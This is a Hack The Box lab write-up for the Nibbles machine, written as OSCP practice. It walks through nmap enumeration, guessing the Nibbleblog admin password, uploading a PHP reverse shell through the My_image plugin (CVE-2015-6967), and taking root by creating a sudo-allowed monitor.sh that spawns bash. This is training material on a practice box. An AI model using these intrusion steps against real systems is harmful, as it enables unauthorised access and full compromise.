Hack The Box — Nibbles — without Metasploit (TJNull’s list for OSCP)

This is my 2nd write-up for Nibbles a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

1. Enumeration and Scanning (Information Gathering).
2. Initial Foothold.
3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.

nmap -sC -sV -A -T4 10.129.229.132

• -sC is used to run default scripts to enumerate the services further.
• -sV is used for Version enumeration of the services
• -A is used for aggressive (not usually recommended in real environment)
• -T4 is used to set the number of parallel threads.

nmap

By running a quick port scan for default ports on the target, we found out that port 22 and 80 are open.

Let’s start enumerating the web-server, as SSH doesn’t usually have to give away anything.

/index.html

By visiting the web-server, we can see that there’s nothing much here… Or is there??

If right-click and view source of this web page.

comment /nibbleblog/

There’s a comment that reveals a directory /nibbleblog/ on the webserver. Let’s navigate to that directory and see what do we have.

Powered by:

On the bottom right we can see Powered by Nibbleblog, this gives me a hunch that it could be an actual off-the-shelf Blogging CMS. To confirm that we can simply Google it.

And I was right, it is indeed an actual Blog system. That’s a really nice thing because we can have its documentation and learn about its default configurations online.

By visiting their Github page (https://github.com/dignajar/nibbleblog) we can see some default files and directories that we can enumerate on our actual target while we put directory busting on the background, this approach can speed up the process.

Github

Directory Busting

Directory busting reveals that we have a README file in Nibbleblog.

Nibbleblog version

Going through the README, reveals the version of Nibbleblog that’s being used, which is 4.0.3

Initial Foothold

Let’s search of an exploit for this version.

By a simple Google search I came accross this exploit on Github https://github.com/dix0nym/CVE-2015-6967

Judging from the example given on the Usage documentation, this exploit needs authentication to upload an arbitrary file.

Right now we don’t have credentials, let’s hunt down for admin credentials before using the exploit.

After enumerating the Nibbleblog default files and directory, admin.php had the administrative login portal.

Let’s try admin:admin first, because these are usually the default credentials.

wrong credentials

admin:admin don’t seem to work. Let’s try admin:nibbles because it was mentioned in the exploit Usage documentation uder example

Admin panel

Lol! xD

(NOTE: I wrote this blog in two different sittings, so the IP of the target machine is changed to 10.129.198.95)

Now let’s try the exploit that we found earlier.

It says Login Successful but Upload likely failed. Hmm…. Let’s try reading the exploit code and see how it works.

upload code

The exploit code seems to target My_image plugin to upload the shell. Let’s see if we have that plugin installed.

Plugins

It seems like we have it installed. Let’s see it’s configuration by simply clicking configure.

My_image configuration

We have an upload option here. Let’s try using this option instead to upload the php_reverse_shell.

warnings

It uploaded with some warnings but there were no errors.

If we look at the exploit code again, under execute_function we can see the location where the exploit gets uploaded.

execute_shell fucntion

Let’s see if we have the image.php file uploaded in My_image plugin directory.

Yes we have! Let’s start a listener to capture the reverse_shell and execute image.php

And we got a Shell!

Let’s collect the user.txt flag first.

user.txt

Privilege Escalation

For privilege escalation let’s see if the current user is able to run any commands with root.

sudo -l

The last 2 lines tell us that user Nibbler can run /home/nibbler/personal/stuff/monitor.sh script as root user without any password.

Let’s see what we have in this script.

cat /home/nibbler/personal/stuff/monitor.sh

No Such file or directory. Means the file doesn’t exist.

Let’s create the personal directory inside /home/nibbler and then stuff directory inside personal directory.

Let’s create monitor.sh here and put code to spawn a bash shell.

bash script to invoke bash

With our monitor.sh ready, let’s make it executable and run it with sudo.

root access

And we got root!!!

Let’s grab the root.txt flag from /root/root.txt

root.txt